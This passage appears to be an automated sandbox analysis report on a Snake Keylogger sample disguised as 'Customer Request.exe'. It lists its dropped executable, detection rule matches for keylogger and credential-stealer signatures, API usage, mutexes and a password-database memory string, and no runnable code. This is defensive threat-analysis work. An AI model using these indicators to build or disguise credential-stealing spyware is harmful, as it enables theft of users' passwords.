                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_0506858811_2_05068588
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_0506000611_2_05060006
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_0506004011_2_05060040
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_0506B8F811_2_0506B8F8
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0517011_2_06D05170
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D00A2011_2_06D00A20
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0C74011_2_06D0C740
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0545311_2_06D05453
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0546011_2_06D05460
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0C30811_2_06D0C308
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041F011_2_06D041F0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041EB11_2_06D041EB
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041BB11_2_06D041BB
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0516011_2_06D05160
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0BED011_2_06D0BED0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0DF4011_2_06D0DF40
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D02C0311_2_06D02C03
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0BA9811_2_06D0BA98
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D00A1011_2_06D00A10
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_083B0A8011_2_083B0A80
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_083BF0B311_2_083BF0B3
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_083B0A7011_2_083B0A70
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_05068ADB11_2_05068ADB
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_05068AE811_2_05068AE8
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AB32815_2_029AB328
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AC19015_2_029AC190
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A610815_2_029A6108
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A673015_2_029A6730
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AC75115_2_029AC751
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AC47015_2_029AC470
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A4AD915_2_029A4AD9
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029ACA3115_2_029ACA31
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029ABBD315_2_029ABBD3
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A985815_2_029A9858
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029ABEB015_2_029ABEB0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AB4F315_2_029AB4F3
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A357015_2_029A3570
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_06E3458815_2_06E34588
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_06E33BC015_2_06E33BC0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_06E33BD015_2_06E33BD0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_06E353A815_2_06E353A8
Source: Customer Request.exe | Static PE information: invalid certificate
Source: Customer Request.exe, 00000000.00000002.1484012977.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Customer Request.exe
Source: Customer Request.exe, 00000000.00000002.1490920950.0000000003A51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs Customer Request.exe
Source: Customer Request.exe, 00000000.00000000.1446331231.0000000000796000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamerqSA.exeF vs Customer Request.exe
Source: Customer Request.exe, 00000000.00000002.1487696864.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Customer Request.exe
Source: Customer Request.exe, 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Customer Request.exe
Source: Customer Request.exe, 00000000.00000002.1490920950.000000000431E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Customer Request.exe
Source: Customer Request.exe, 00000000.00000002.1503031924.000000000B670000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Customer Request.exe
Source: Customer Request.exe, 00000000.00000002.1501024869.0000000007460000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs Customer Request.exe
Source: Customer Request.exe, 0000000A.00000002.2745847494.0000000006EC9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Customer Request.exe
Source: Customer Request.exe | Binary or memory string: OriginalFilenamerqSA.exeF vs Customer Request.exe
Source: Customer Request.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: sslproxydump.pcap, type: PCAP | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.Customer Request.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.2710969497.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, EqMLXp468anp44vyd9.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, EqMLXp468anp44vyd9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Customer Request.exe.44b9a00.2.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, EqMLXp468anp44vyd9.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, EqMLXp468anp44vyd9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, frwa3jjtrF5QwZLvOa.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, EqMLXp468anp44vyd9.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Customer Request.exe.b670000.5.raw.unpack, EqMLXp468anp44vyd9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@21/17@3/3
Source: C:\Users\user\Desktop\Customer Request.exe | File created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Mutant created: \Sessions\1\BaseNamedObjects\xVHOUlaxka
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
Source: C:\Users\user\Desktop\Customer Request.exe | File created: C:\Users\user\AppData\Local\Temp\tmpBA61.tmp
Source: Customer Request.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Customer Request.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\Customer Request.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Customer Request.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Customer Request.exe, 0000000A.00000002.2717700479.000000000410E000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C88000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2717613443.0000000003A8E000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002C36000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key 